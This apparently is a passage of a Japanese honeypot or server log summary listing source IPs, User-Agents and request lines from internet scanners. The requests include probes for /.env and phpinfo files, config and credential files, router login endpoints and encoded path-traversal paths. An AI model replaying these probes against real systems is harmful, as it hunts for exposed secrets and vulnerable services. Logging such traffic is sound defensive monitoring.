2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.33.80.243 United States
1 45.56.108.128 United States
3 45.79.128.205 United States
14 45.156.129.12 Hungary
1 45.227.254.48 Belize
7 54.37.79.75 France
12 54.209.181.88 United States
1 64.62.197.137 United States
1 65.49.1.17 United States
1 65.49.1.19 United States
2 83.97.73.87 Germany
2 84.54.51.12 Bulgaria
1 84.54.51.146 Bulgaria
2 103.178.228.36 Vietnam
2 138.68.143.68 United States
1 143.244.42.106 United Kingdom
31 159.100.30.64 Germany
2 162.142.125.215 United States
4 164.52.49.122 China
2 167.71.229.198 United States
2 167.94.138.36 United States
2 167.94.146.51 United States
2 167.248.133.52 United States
2 172.104.11.4 United States
1 172.105.128.11 United States
2 172.105.128.12 United States
1 172.105.128.13 United States
1 179.43.163.134 Panama
1 179.43.191.194 Panama
1 185.170.144.3 Estonia
1 192.155.90.220 United States
1 192.241.227.16 United States
1 198.235.24.156 United States
1 205.210.31.214 United States

UserAgent一覧

件数 UserAgent
29 -
5 Go-http-client/1.1
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
3 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_13.67.44.234_80
2 \x03
20 \x16\x03\x01
2 CONNECT google[.]com:443 HTTP/1.1
7 GET /.env HTTP/1.1
1 GET /.scrutinizer.yml HTTP/1.1
1 GET /99vt HTTP/1.1
1 GET /99vu HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_profiler/phpinfo.php HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
2 GET /aaa9 HTTP/1.1
1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /app/config/security.yml HTTP/1.1
1 GET /asdf.php HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
1 GET /cgi-bin/printenv HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /config/packages/security.yaml HTTP/1.1
1 GET /config/user.xml HTTP/1.1
1 GET /core/config/databases.yml HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /ftpsync.settings HTTP/1.1
1 GET /gate.php HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /infophp.php HTTP/1.1
1 GET /infos.php HTTP/1.1
1 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /old_phpinfo.php HTTP/1.1
1 GET /package-lock.json HTTP/1.1
1 GET /package.json HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /php_info.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpversion.php HTTP/1.1
1 GET /pinfo.php HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /rollup.config.js HTTP/1.1
1 GET /showLogin.cc HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /static/historypage.js HTTP/1.1
1 GET /sugar_version.json HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /temp.php HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /time.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
4 PRI * HTTP/2.0